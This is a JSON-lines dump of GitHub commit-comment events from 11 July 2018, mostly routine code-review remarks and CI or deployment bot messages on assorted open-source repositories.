{"id":"7951427234","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"openSUSE/libsolv"},"payload":{"comment":{"id":29674196,"position":13,"line":274,"path":"src/repodata.h","commit_id":"72e8b9af78a98e7226d1d30e3f00848c8b4c36d9","created_at":"2018-07-11T17:07:15Z","updated_at":"2018-07-11T17:07:15Z","author_association":"COLLABORATOR","body":"isn't the `struct _KeyValue` is kinda internal?"}},"created_at":"2018-07-11T17:07:15Z"}
{"id":"7951428932","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29674200,"position":null,"line":null,"path":null,"commit_id":"b47e1543956b7e3fbc2cefa1d169889d3d044940","created_at":"2018-07-11T17:07:36Z","updated_at":"2018-07-11T17:07:36Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-170734 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-170734\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T17:07:36Z"}
{"id":"7951429005","type":"CommitCommentEvent","actor":{"login":"Vierwood"},"repo":{"name":"Altemio/SevenKingdoms-master"},"payload":{"comment":{"id":29674202,"position":null,"line":null,"path":null,"commit_id":"59e6955e7de5c3c9d8a45e5dd9eff70eecfeeb5c","created_at":"2018-07-11T17:07:36Z","updated_at":"2018-07-11T17:07:36Z","author_association":"COLLABORATOR","body":"Trade routes have always caused crashes for us for some reason. "}},"created_at":"2018-07-11T17:07:36Z"}
{"id":"7951429028","type":"CommitCommentEvent","actor":{"login":"Khrystyna2"},"repo":{"name":"Khrystyna2/take-away.github.io"},"payload":{"comment":{"id":29674203,"position":null,"line":null,"path":null,"commit_id":"1ade8525a87287f139e99cedf0787b283ffb65b9","created_at":"2018-07-11T17:07:37Z","updated_at":"2018-07-11T17:07:37Z","author_association":"OWNER","body":"dan"}},"created_at":"2018-07-11T17:07:37Z"}
{"id":"7951429791","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/fletcher-feedstock"},"payload":{"comment":{"id":29674204,"position":null,"line":null,"path":null,"commit_id":"b76ba943553917c04a1c3af4855f96e70dc66aaf","created_at":"2018-07-11T17:07:45Z","updated_at":"2018-07-11T17:07:45Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @fjetter were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @fjetter were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-11T17:07:45Z"}
{"id":"7951437990","type":"CommitCommentEvent","actor":{"login":"Niekumaku"},"repo":{"name":"Niekumaku/hello-word"},"payload":{"comment":{"id":29674225,"position":null,"line":null,"path":null,"commit_id":"580ac352963ae24a9cf5e64cac27e09ed78653f5","created_at":"2018-07-11T17:09:25Z","updated_at":"2018-07-11T17:09:25Z","author_association":"OWNER","body":"Add some infos about me"}},"created_at":"2018-07-11T17:09:25Z"}
{"id":"7951441806","type":"CommitCommentEvent","actor":{"login":"kelunik"},"repo":{"name":"concurrent-php/task"},"payload":{"comment":{"id":29674235,"position":14,"line":290,"path":"src/deferred.c","commit_id":"8548db729df911a436955effde528951bb05432f","created_at":"2018-07-11T17:10:13Z","updated_at":"2018-07-11T17:10:13Z","author_association":"NONE","body":"IMO this should do just nothing."}},"created_at":"2018-07-11T17:10:13Z"}
{"id":"7951442073","type":"CommitCommentEvent","actor":{"login":"capricorn2001"},"repo":{"name":"vantu5z/RHVoice-dictionary"},"payload":{"comment":{"id":29674236,"position":null,"line":null,"path":null,"commit_id":"5d217a862d886a0abd6baaa15e4a4b5e15ac9996","created_at":"2018-07-11T17:10:15Z","updated_at":"2018-07-11T17:10:15Z","author_association":"COLLABORATOR","body":"**vantu5z**, будь добр, посмотри, не сделал ли я какой-нибудь ошибки в новом участке кода? Плохо ориентируюсь в этих процедурах :)"}},"created_at":"2018-07-11T17:10:15Z"}
{"id":"7951446345","type":"CommitCommentEvent","actor":{"login":"kelunik"},"repo":{"name":"concurrent-php/task"},"payload":{"comment":{"id":29674247,"position":5,"line":172,"path":"src/task_scheduler.c","commit_id":"21aff92d010847c87ab3a7c284f57c6658c038f0","created_at":"2018-07-11T17:11:04Z","updated_at":"2018-07-11T17:11:04Z","author_association":"NONE","body":"Shouldn't that just auto-await?"}},"created_at":"2018-07-11T17:11:04Z"}
{"id":"7951452298","type":"CommitCommentEvent","actor":{"login":"sarahbwebdev"},"repo":{"name":"sarahbwebdev/sarahbreidenbach-com"},"payload":{"comment":{"id":29674259,"position":null,"line":null,"path":null,"commit_id":"773b0a5e7c142644778cf66d0e888d7a5fb735a7","created_at":"2018-07-11T17:12:16Z","updated_at":"2018-07-11T17:12:16Z","author_association":"OWNER","body":"I'm not putting this on my website after all. At least not now."}},"created_at":"2018-07-11T17:12:16Z"}
{"id":"7951453095","type":"CommitCommentEvent","actor":{"login":"MrJacz"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29674262,"position":5,"line":17,"path":"commands/Image Manipulation/achievement.js","commit_id":"523aabfb13b635b6ccf94542495060d8c528f5c9","created_at":"2018-07-11T17:12:25Z","updated_at":"2018-07-11T17:12:25Z","author_association":"COLLABORATOR","body":"this should be\r\n`.catch(() => { throw msg.language.get(\"ER_TRY_AGAIN\") });`"}},"created_at":"2018-07-11T17:12:25Z"}
{"id":"7951457858","type":"CommitCommentEvent","actor":{"login":"elezar"},"repo":{"name":"dcos/dcos-metrics"},"payload":{"comment":{"id":29674271,"position":5,"line":31,"path":"collectors/mesos/agent/agent.go","commit_id":"0c801d81455647ff9e808761262191ea0603a9e2","created_at":"2018-07-11T17:13:22Z","updated_at":"2018-07-11T17:13:22Z","author_association":"NONE","body":"It is my understanding that we already make this configurable in the target branch?"}},"created_at":"2018-07-11T17:13:22Z"}
{"id":"7951466101","type":"CommitCommentEvent","actor":{"login":"mawhinn"},"repo":{"name":"mawhinn/mawhinn.github.io"},"payload":{"comment":{"id":29674286,"position":null,"line":null,"path":null,"commit_id":"5648e8db9c86810123a379e89368f837f40b29cb","created_at":"2018-07-11T17:15:03Z","updated_at":"2018-07-11T17:15:03Z","author_association":"OWNER","body":"Opacity 100% fixed with the commit following this one."}},"created_at":"2018-07-11T17:15:03Z"}
{"id":"7951474417","type":"CommitCommentEvent","actor":{"login":"elezar"},"repo":{"name":"dcos/dcos-metrics"},"payload":{"comment":{"id":29674298,"position":15,"line":112,"path":"dcos-metrics.go","commit_id":"0c801d81455647ff9e808761262191ea0603a9e2","created_at":"2018-07-11T17:16:41Z","updated_at":"2018-07-11T17:16:41Z","author_association":"NONE","body":"This effectively does this:\r\n* https://github.com/dcos/dcos-metrics/blob/1.10.x-CORE-1517/collectors/framework/record.go#L138\r\n* https://github.com/dcos/dcos-metrics/blob/1.10.x-CORE-1517/collectors/mesos/agent/agent.go#L274\r\n\r\nIt would be good to only do this once if applicable."}},"created_at":"2018-07-11T17:16:41Z"}
{"id":"7951476541","type":"CommitCommentEvent","actor":{"login":"tttt124566"},"repo":{"name":"tttt124566/0-10-"},"payload":{"comment":{"id":29674307,"position":21,"line":21,"path":"750-760/758-BoldStrings.java","commit_id":"8f3b5f3d9d1cd60f39e884ab751a29887b661d0b","created_at":"2018-07-11T17:17:08Z","updated_at":"2018-07-11T17:17:08Z","author_association":"OWNER","body":"Be careful to check i < S.length()"}},"created_at":"2018-07-11T17:17:08Z"}
{"id":"7951478007","type":"CommitCommentEvent","actor":{"login":"Arina1004"},"repo":{"name":"Arina1004/---"},"payload":{"comment":{"id":29674313,"position":null,"line":null,"path":null,"commit_id":"1233232375e24be0b101b3c5c0a99c39e8c6ab90","created_at":"2018-07-11T17:17:24Z","updated_at":"2018-07-11T17:17:24Z","author_association":"OWNER","body":"Первый проект"}},"created_at":"2018-07-11T17:17:24Z"}
{"id":"7951478138","type":"CommitCommentEvent","actor":{"login":"tttt124566"},"repo":{"name":"tttt124566/0-10-"},"payload":{"comment":{"id":29674315,"position":23,"line":23,"path":"750-760/758-BoldStrings.java","commit_id":"8f3b5f3d9d1cd60f39e884ab751a29887b661d0b","created_at":"2018-07-11T17:17:26Z","updated_at":"2018-07-11T17:17:26Z","author_association":"OWNER","body":"Be careful to jump out of the loop when we can't find the word in S"}},"created_at":"2018-07-11T17:17:26Z"}
{"id":"7951478900","type":"CommitCommentEvent","actor":{"login":"ebraminio"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29674316,"position":null,"line":null,"path":null,"commit_id":"bca83618cda7ee4f683b4685d10db9e1bef4983c","created_at":"2018-07-11T17:17:35Z","updated_at":"2018-07-11T17:17:35Z","author_association":"MEMBER","body":"Very interesting"}},"created_at":"2018-07-11T17:17:35Z"}
{"id":"7951478922","type":"CommitCommentEvent","actor":{"login":"shu8"},"repo":{"name":"soscripted/sox"},"payload":{"comment":{"id":29674317,"position":5,"line":4,"path":"sox.user.js","commit_id":"22492af8a9fc26745eeee55b619c245d14d6f0d6","created_at":"2018-07-11T17:17:35Z","updated_at":"2018-07-11T17:17:35Z","author_association":"MEMBER","body":"I will do really soon! I'm planning on trying to reduce the number of API calls by combining them, so I'll try getting that done before I push the new version :)"}},"created_at":"2018-07-11T17:17:35Z"}
{"id":"7951481965","type":"CommitCommentEvent","actor":{"login":"ScratchBuild"},"repo":{"name":"ScratchBuild/MIUI10-XML-Japanese"},"payload":{"comment":{"id":29674322,"position":1,"line":1,"path":"Japanese/main/Provision.apk/res/values-ja/arrays.xml","commit_id":"ad5212f956531038a360f91fd4b3e687bf7656fb","created_at":"2018-07-11T17:18:09Z","updated_at":"2018-07-11T17:18:09Z","author_association":"OWNER","body":"Fixes 116935e"}},"created_at":"2018-07-11T17:18:09Z"}
{"id":"7951483142","type":"CommitCommentEvent","actor":{"login":"mhosan"},"repo":{"name":"mhosan/apiRest"},"payload":{"comment":{"id":29674324,"position":null,"line":null,"path":null,"commit_id":"4ea483e61ac5d5a22ae4d12d7c71fd92d7fad6b5","created_at":"2018-07-11T17:18:22Z","updated_at":"2018-07-11T17:18:22Z","author_association":"OWNER","body":"Versión inicial de un crud con MEAN. Utiliza una coleccion de mongodb, que cuando inicia si no existe la crea."}},"created_at":"2018-07-11T17:18:22Z"}
{"id":"7951484275","type":"CommitCommentEvent","actor":{"login":"originx"},"repo":{"name":"hannesa2/DbPreferences"},"payload":{"comment":{"id":29674326,"position":5,"line":6,"path":"DBPrefs/src/main/java/info/dbprefs/lib/ConfigKey.kt","commit_id":"3db06ed0302e3dac0060eaa73f25ff4375a35335","created_at":"2018-07-11T17:18:36Z","updated_at":"2018-07-11T17:18:36Z","author_association":"NONE","body":"what happens if user renames keys file to something else he will not be able to access his data anymore.\r\nFor example\r\nFeatureXConfigKeys --> CoreConfigKeys\r\n\r\ni guess having strings gives flexibiltity for the user to decide how he wants to handle it"}},"created_at":"2018-07-11T17:18:36Z"}
{"id":"7951486748","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29674332,"position":null,"line":null,"path":null,"commit_id":"885e27e31ca7e79ab8114704bd6f5cf361b72319","created_at":"2018-07-11T17:19:08Z","updated_at":"2018-07-11T17:19:08Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-171901 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-171901\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T17:19:08Z"}
{"id":"7951488214","type":"CommitCommentEvent","actor":{"login":"jpmckinney"},"repo":{"name":"open-contracting/standard"},"payload":{"comment":{"id":29674336,"position":null,"line":null,"path":null,"commit_id":"9faa33753fbcb75e2909e993a05cd4a9046c4b12","created_at":"2018-07-11T17:19:24Z","updated_at":"2018-07-11T17:19:24Z","author_association":"MEMBER","body":"I made the change as a result of [this discussion](https://github.com/open-contracting/extension_registry/pull/94#issuecomment-391684102). I can restore `sudo: false` to all repos, so that, as maintainers, we don't need to know when a repo was added to Travis in order to know what environment it's being tested on."}},"created_at":"2018-07-11T17:19:24Z"}
{"id":"7951489374","type":"CommitCommentEvent","actor":{"login":"frju365"},"repo":{"name":"spring1944/spring1944"},"payload":{"comment":{"id":29674339,"position":null,"line":null,"path":null,"commit_id":"f67e7d460edb9872cd4ccc3fc6dbe8bdd5339e8b","created_at":"2018-07-11T17:19:39Z","updated_at":"2018-07-11T17:19:39Z","author_association":"CONTRIBUTOR","body":"Well, I'm not a dev... but I don't know if ppl are knowing that JAL is the lead dev of Spring1944, and quite the only one (With Sanguinario, Yuritch and Buumi) who test and dev the core of Spring1944. I agree with last comment of @PepeAmpere first point. \r\n\r\nIt's not a superpower... but JAL and Yuritch are the persons who knows the best the balance. I still think that JAL and Yuritch are the \"owners\" of SPring1944 (project admin), so I find it's normal that JAL and Yuritch still make changes without point of view of each users (at least for little change or with small effect).\r\n\r\n(And still, it's my point of view, I'm not a dev)"}},"created_at":"2018-07-11T17:19:39Z"}
{"id":"7951491389","type":"CommitCommentEvent","actor":{"login":"ThisMushroom"},"repo":{"name":"MUnique/OpenMU"},"payload":{"comment":{"id":29674344,"position":null,"line":null,"path":null,"commit_id":"2e79aa24bed37035790a513bb795f4b588c8145b","created_at":"2018-07-11T17:20:04Z","updated_at":"2018-07-11T17:20:04Z","author_association":"NONE","body":"Oh yeah, you're right. Missed that. Im dumb T_T\r\n\r\nAbout durability and learnable items. \r\nLets get deeper - learnables has their personal handler. It seems durability check for learnables it not necessary as soon as there are no stackable and learnable items at the same time (like in case of \"number of pieces\").\r\n\r\nPotions and e.g. fruits, has their handlers... \r\n\r\nOr am I thinking wrong?"}},"created_at":"2018-07-11T17:20:04Z"}
{"id":"7951498469","type":"CommitCommentEvent","actor":{"login":"elezar"},"repo":{"name":"dcos/dcos-metrics"},"payload":{"comment":{"id":29674360,"position":29,"line":50,"path":"util/producers/producers.go","commit_id":"0c801d81455647ff9e808761262191ea0603a9e2","created_at":"2018-07-11T17:21:28Z","updated_at":"2018-07-11T17:21:28Z","author_association":"NONE","body":"This is related to the comments above for stripping out long metrics. As mentioned, it would be good to do this consistently."}},"created_at":"2018-07-11T17:21:28Z"}
{"id":"7951498864","type":"CommitCommentEvent","actor":{"login":"vvv09"},"repo":{"name":"vvv09/OnlineLibraryProject"},"payload":{"comment":{"id":29674364,"position":null,"line":null,"path":null,"commit_id":"443b3533ceeafa608f723574ec984acfdedec8bd","created_at":"2018-07-11T17:21:33Z","updated_at":"2018-07-11T17:21:33Z","author_association":"OWNER","body":"added search 1) by genre, 2) by first letter of title, 3) by any letter in title/author"}},"created_at":"2018-07-11T17:21:33Z"}
{"id":"7951499104","type":"CommitCommentEvent","actor":{"login":"lloiodice"},"repo":{"name":"syzer/tesseract"},"payload":{"comment":{"id":29674365,"position":null,"line":null,"path":null,"commit_id":"a90e499a66aa192e86ab5949b97dbf5bb139285e","created_at":"2018-07-11T17:21:36Z","updated_at":"2018-07-11T17:21:36Z","author_association":"NONE","body":"The change I made to solve a similar related issue \r\nhttps://github.com/tesseract-ocr/tesseract/issues/1222\r\nwas at line 513 in get_isdigit method"}},"created_at":"2018-07-11T17:21:36Z"}
{"id":"7951500811","type":"CommitCommentEvent","actor":{"login":"khardenstine"},"repo":{"name":"hyperfiddle/hyperfiddle"},"payload":{"comment":{"id":29674366,"position":36,"line":267,"path":"src/hyperfiddle/ui.cljs","commit_id":"230007c6e73366885c43418955350afbb6ebf746","created_at":"2018-07-11T17:21:54Z","updated_at":"2018-07-11T17:21:54Z","author_association":"MEMBER","body":"This still needed?"}},"created_at":"2018-07-11T17:21:54Z"}
{"id":"7951504378","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"p51i/next50"},"payload":{"comment":{"id":29674372,"position":null,"line":null,"path":null,"commit_id":"962b6b022f00e5df9e9ab21bfd61ae38506b35b9","created_at":"2018-07-11T17:22:37Z","updated_at":"2018-07-11T17:22:37Z","author_association":"OWNER","body":"Created multidev environment [next50#pr-1](https://dashboard.pantheon.io/sites/5a4cf60c-6be0-499b-aba2-a87e5c886799#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-next50.pantheonsite.io/)"}},"created_at":"2018-07-11T17:22:37Z"}
{"id":"7951505428","type":"CommitCommentEvent","actor":{"login":"itchka"},"repo":{"name":"OpenMandrivaAssociation/supervisor"},"payload":{"comment":{"id":29674374,"position":37,"line":52,"path":"supervisor.spec","commit_id":"7f696f6545e3957f86d88bb7093cb386e5bff733","created_at":"2018-07-11T17:22:49Z","updated_at":"2018-07-11T17:22:49Z","author_association":"CONTRIBUTOR","body":"I also added this file to %files"}},"created_at":"2018-07-11T17:22:49Z"}
{"id":"7951509270","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29674382,"position":27,"line":27,"path":"ruby_module_9/interface_station.rb","commit_id":"d7f732ceb61fae7be39e90ca1340eb589dd000ff","created_at":"2018-07-11T17:23:35Z","updated_at":"2018-07-11T17:23:35Z","author_association":"NONE","body":"24 - 27 блок я бы вынес в метод"}},"created_at":"2018-07-11T17:23:35Z"}
{"id":"7951512221","type":"CommitCommentEvent","actor":{"login":"lisakowen"},"repo":{"name":"greenplum-db/gpdb"},"payload":{"comment":{"id":29674388,"position":20,"line":36,"path":"gpdb-doc/dita/admin_guide/managing/plugin_api/cleanup_plugin_for_backup.xml","commit_id":"bd6ea0994af8f7acf1e285f035f07a36b5c76c1f","created_at":"2018-07-11T17:24:11Z","updated_at":"2018-07-11T17:24:11Z","author_association":"CONTRIBUTOR","body":"my interpretation of what is going on is the following:\r\n\r\nscope\r\nthe execution scope of the command:\r\n    master - gpbackup is invoking the command on the master host\r\n    segment_host - gpbackup is invoking the command on this segment host\r\n    segment - gpbackup is invoking the command for this segment instance on this segment host (?? i don't quite understand how this works, i.e. how, on a specific segment host, the plugin can determine which segment instance the plugin command is called for.)\r\n\t\r\nThe hosts and segment instances are determined by the Greenplum Database configuration in place when the back up was first initiated."}},"created_at":"2018-07-11T17:24:11Z"}
{"id":"7951513405","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29674391,"position":68,"line":68,"path":"ruby_module_9/interface_train.rb","commit_id":"d7f732ceb61fae7be39e90ca1340eb589dd000ff","created_at":"2018-07-11T17:24:25Z","updated_at":"2018-07-11T17:24:25Z","author_association":"NONE","body":"проки можно было в отдельные методы вместо переменных унести"}},"created_at":"2018-07-11T17:24:25Z"}
{"id":"7951514040","type":"CommitCommentEvent","actor":{"login":"elezar"},"repo":{"name":"dcos/dcos-metrics"},"payload":{"comment":{"id":29674393,"position":44,"line":177,"path":"producers/prometheus/prometheus.go","commit_id":"0c801d81455647ff9e808761262191ea0603a9e2","created_at":"2018-07-11T17:24:31Z","updated_at":"2018-07-11T17:24:31Z","author_association":"NONE","body":"It's not clear why this was required, but it would be good to break this out into separate functions to make the intent a little clearer."}},"created_at":"2018-07-11T17:24:31Z"}
{"id":"7951536449","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29674429,"position":null,"line":null,"path":null,"commit_id":"a20f105b5bb2fc9b8d18ccec9a6f18a3f533b154","created_at":"2018-07-11T17:28:46Z","updated_at":"2018-07-11T17:28:46Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-172844 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-172844\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T17:28:46Z"}
{"id":"7951537451","type":"CommitCommentEvent","actor":{"login":"lisakowen"},"repo":{"name":"greenplum-db/gpdb"},"payload":{"comment":{"id":29674432,"position":10,"line":101,"path":"gpdb-doc/dita/admin_guide/managing/backup-plugin-api.xml","commit_id":"bd6ea0994af8f7acf1e285f035f07a36b5c76c1f","created_at":"2018-07-11T17:28:58Z","updated_at":"2018-07-11T17:28:58Z","author_association":"CONTRIBUTOR","body":"what about \"execution scope (master, segment host, segment instance)\"?"}},"created_at":"2018-07-11T17:28:58Z"}
{"id":"7951538046","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29674433,"position":23,"line":23,"path":"ruby_module_9/interface_station.rb","commit_id":"d7f732ceb61fae7be39e90ca1340eb589dd000ff","created_at":"2018-07-11T17:29:06Z","updated_at":"2018-07-11T17:29:06Z","author_association":"NONE","body":"вместо отрицания и `empty?` лушче использовать `any?`"}},"created_at":"2018-07-11T17:29:06Z"}
{"id":"7951538372","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29674434,"position":null,"line":null,"path":null,"commit_id":"c420eb1bb06e3fe01526496bcaf2fecc702f2fa4","created_at":"2018-07-11T17:29:10Z","updated_at":"2018-07-11T17:29:10Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-MacOS-10.9-clang: OK (2770 of 2932 tests passed, 10 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 131 tests had: EIO diffs.\n * 96 tests had: ESO big diffs.\n * 160 tests had: Table big diffs.\n * 23 tests had: ERR diffs.\n * 57 tests had: MTR big diffs.\n * 21 tests had: ESO small diffs.\n * 17 tests had: MTR small diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 644\n * Failed: 1\n\nregression Test Summary\n * Passed: 462\n * Failed: 161\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c420eb1bb06e3fe01526496bcaf2fecc702f2fa4-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c420eb1bb06e3fe01526496bcaf2fecc702f2fa4-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.47%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T17:29:10Z"}
{"id":"7951542647","type":"CommitCommentEvent","actor":{"login":"lisakowen"},"repo":{"name":"greenplum-db/gpdb"},"payload":{"comment":{"id":29674442,"position":12,"line":103,"path":"gpdb-doc/dita/admin_guide/managing/backup-plugin-api.xml","commit_id":"bd6ea0994af8f7acf1e285f035f07a36b5c76c1f","created_at":"2018-07-11T17:30:01Z","updated_at":"2018-07-11T17:30:01Z","author_association":"CONTRIBUTOR","body":"see my comments on cleanup_plugin_for_backup."}},"created_at":"2018-07-11T17:30:01Z"}
{"id":"7951546181","type":"CommitCommentEvent","actor":{"login":"mahdiyari"},"repo":{"name":"utopian-io/v2.utopian.io"},"payload":{"comment":{"id":29674454,"position":24,"line":35,"path":"src/services/steem/connect/comment.js","commit_id":"6db36a4626d58a4f2b84df2bafff2727cea450ce","created_at":"2018-07-11T17:30:41Z","updated_at":"2018-07-11T17:30:41Z","author_association":"NONE","body":"Most of the users will need 100% SP when the price of SBD go under 1 USD (at that point 100% SP will be more profitable)"}},"created_at":"2018-07-11T17:30:41Z"}
{"id":"7951547717","type":"CommitCommentEvent","actor":{"login":"gastaldi"},"repo":{"name":"fabric8-launcher/demo-cloud-app-creator"},"payload":{"comment":{"id":29674458,"position":19,"line":25,"path":"src/components/TemplateItem.js","commit_id":"ea6b8569bd9954b7cb72f35ef5fb625ca4b10197","created_at":"2018-07-11T17:30:59Z","updated_at":"2018-07-11T17:30:59Z","author_association":"CONTRIBUTOR","body":"n00b :laughing: "}},"created_at":"2018-07-11T17:30:59Z"}
{"id":"7951554642","type":"CommitCommentEvent","actor":{"login":"mifl"},"repo":{"name":"mifl/aquaris-U-Plus"},"payload":{"comment":{"id":29674473,"position":5,"line":984,"path":"sound/core/rawmidi.c","commit_id":"f44c3e1ff2208d82f683c4526efed2f7776cf5b3","created_at":"2018-07-11T17:32:20Z","updated_at":"2018-07-11T17:32:20Z","author_association":"OWNER","body":"Lines 983 and 984 are duplicated. To clarify this, can see the commit:\r\nhttps://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=a3d3f4df0b4768f3bb41209bcf601a394fbca5d5"}},"created_at":"2018-07-11T17:32:20Z"}
{"id":"7951554935","type":"CommitCommentEvent","actor":{"login":"CAPCHIK"},"repo":{"name":"ITLabRTUMIREA/ITLab-Back"},"payload":{"comment":{"id":29674475,"position":null,"line":null,"path":null,"commit_id":"21c07bfa241e6080a319d3610e09de1212abe0ac","created_at":"2018-07-11T17:32:24Z","updated_at":"2018-07-11T17:32:24Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Поиск по пользователям (пока что по email), так же как и в EventType](https://trello.com/c/EZeoz1s0/53-%D0%BF%D0%BE%D0%B8%D1%81%D0%BA-%D0%BF%D0%BE-%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D0%B5%D0%BB%D1%8F%D0%BC-%D0%BF%D0%BE%D0%BA%D0%B0-%D1%87%D1%82%D0%BE-%D0%BF%D0%BE-email-%D1%82%D0%B0%D0%BA-%D0%B6%D0%B5-%D0%BA%D0%B0%D0%BA-%D0%B8-%D0%B2-eventtype)"}},"created_at":"2018-07-11T17:32:24Z"}
{"id":"7951556684","type":"CommitCommentEvent","actor":{"login":"aligunaydin77"},"repo":{"name":"MGGMRT/Maze"},"payload":{"comment":{"id":29674476,"position":31,"line":102,"path":"src/test/java/MazeTest.java","commit_id":"7662af6cec745fde09e122f0e18cfae00ccc8f9a","created_at":"2018-07-11T17:32:45Z","updated_at":"2018-07-11T17:32:45Z","author_association":"NONE","body":"budur"}},"created_at":"2018-07-11T17:32:45Z"}
{"id":"7951560057","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29674486,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-11T17:33:25Z","updated_at":"2018-07-11T17:33:25Z","author_association":"NONE","body":" i love stolen code  how about you owen gonzalez"}},"created_at":"2018-07-11T17:33:25Z"}
{"id":"7951563072","type":"CommitCommentEvent","actor":{"login":"torarnv"},"repo":{"name":"fardog/fardog.io"},"payload":{"comment":{"id":29674490,"position":153,"line":153,"path":"content/blog/2017-12-29-nginx-client-side-certificates.md","commit_id":"52ac7c1f890192be9cbeeb015c078caf327799c5","created_at":"2018-07-11T17:34:02Z","updated_at":"2018-07-11T17:34:02Z","author_association":"NONE","body":"The `-certfile ca.crt` part here caused Safari and Chrome on macOS, and Safari on iOS, to never use (or even ask to use) the cert. Perhaps due to the CA not being trusted? Without this argument the p12 file works fine without having to explicitly trust anything in Keychain on macOS/iOS."}},"created_at":"2018-07-11T17:34:02Z"}
